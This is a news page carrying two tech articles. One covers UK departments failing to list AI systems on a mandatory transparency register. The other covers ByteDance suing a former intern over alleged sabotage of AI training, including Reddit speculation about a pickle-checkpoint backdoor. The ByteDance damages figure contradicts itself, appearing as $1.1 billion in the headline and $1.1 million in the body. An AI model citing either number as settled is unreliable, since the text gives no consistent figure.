
Image by Freepik
UK Government Fails to Disclose AI Use, Breaching Transparency Mandate
- Written by Kiara Fabbri Former Tech News Writer
- Fact-Checked by Sarah Frazier Former Content Manager
The UK government faces criticism for failing to document AI usage on a mandatory register, raising transparency and accountability concerns amid growing adoption.
In a Rush? Here are the Quick Facts!
- No Whitehall department has registered AI use despite a mandatory transparency policy.
- AI is used in welfare, immigration, and policing without public documentation.
- Critics warn secrecy undermines trust and risks harmful or discriminatory outcomes.
The UK government is under fire for failing to record its use of AI systems on a mandatory public register, raising concerns over the transparency and oversight of technologies potentially affecting millions of lives, as reported on Thursday by The Guardian .
Despite announcing in February 2024 that all Whitehall departments must document their use of AI , none have complied, leaving the public sector “flying blind” in its adoption of algorithmic technology, as noted by The Guardian.
AI is already deeply embedded in government decision-making, influencing areas such as welfare payments, immigration enforcement, and policing.
However, The Guardian notes that only nine algorithmic systems have been registered, excluding major programs used by the Home Office, the Department for Work and Pensions (DWP), and police forces.
This lack of disclosure persists even as contracts for AI and algorithmic services surge. For instance, The Guardian notes that a police procurement body recently advertised a £20 million contract for facial recognition technology, sparking fears over unregulated biometric surveillance.
Science and Technology Secretary Peter Kyle acknowledged the issue, stating that government departments have not taken transparency “seriously enough,” as reported by The Guardian.
He emphasized the public’s right to understand how algorithms are deployed, adding that trust can only be built through openness.
The Guardian notes that critics argue the secrecy poses significant risks. Madeleine Stone, chief advocacy officer at privacy group Big Brother Watch, warned,
“The secretive use of AI and algorithms to impact people’s lives puts everyones’ data rights at risk. Government departments must be open and honest about how they uses this tech,” as reported by The Guardian.
The Ada Lovelace Institute echoed these concerns, highlighting that undisclosed AI systems can undermine public trust and lead to discriminatory or ineffective outcomes, as reported by The Guardian.
Since the AI register’s introduction, only three systems have been listed, including a pedestrian monitoring tool in Cambridge and an NHS review analysis system. Meanwhile, public bodies have signed 164 AI-related contracts in 2024 alone, according to data firm Tussell, as reported by The Guardian.
High-profile contracts include the NHS’s £330 million partnership with Palantir for a data platform and Derby City Council’s £7 million AI transformation initiative, said The Guardian.
The Home Office, which employs AI in immigration enforcement, and other departments declined to comment on their absence from the register. However, the Department for Science and Technology claims more records are “due to be published shortly,” reported The Guardian.
The situation has reignited debates about AI’s role in governance, with advocates urging transparency to mitigate harms and ensure public accountability in an era of rapidly advancing technology.

Court order by Nick Youngson CC BY-SA 3.0 Pix4free
ByteDance Sues Intern For $1.1 Billion In Damages From AI Breach
- Written by Andrea Miliani Former Tech News Expert
The Chinese giant ByteDance, TikTok’s parent company, is suing its former intern, Tian Keyu, for $1.1 million in damages from an AI breach. ByteDance alleges that Tian manipulated the code by making unauthorized changes.
In a Rush? Here are the Quick Facts!
- ByteDance is suing its former intern Tian Keyu for attacking the company’s AI model training infrastructure
- The tech giant is asking for $1.1 billion in damages, an unusual amount of money for companies suing former employees
- The lawsuit was filed at the Haidian District People’s Court in Beijing
According to Reuters , ByteDance is accusing Tian of deliberately attacking the company’s AI model training infrastructure and has filed a lawsuit with the Haidian District People’s Court in Beijing, China.
The information was revealed by the international news agency today, and Bytedance has declined to comment on the case. The intern, a postgraduate student at Peking University, hasn’t commented or shared any public statement yet.
While lawsuits from companies to employees are common in China, it is rare to see lawsuits for such a large sum.
According to The Guardian , the incident happened in August and the company fired the intern for sabotaging and claimed that the person ‘maliciously interfered’ with the AI project.
The news went viral and was largely commented on on social media channels. Back then, Bytedance shared a public statement and called the rumors “exaggerations” including those saying that 8,000 graphic units were compromised and that the losses were around tens of millions of dollars.
Users on Reddit debated multiple theories of what could have happened and whether he was guilty or not. “Apparently, he implanted a backdoor into checkpoint models (unsafe pickle) to gain access to systems and then used this to sabotage colleagues’ work,” wrote a user. “Quite some heavy lifting for an intern,” added another user.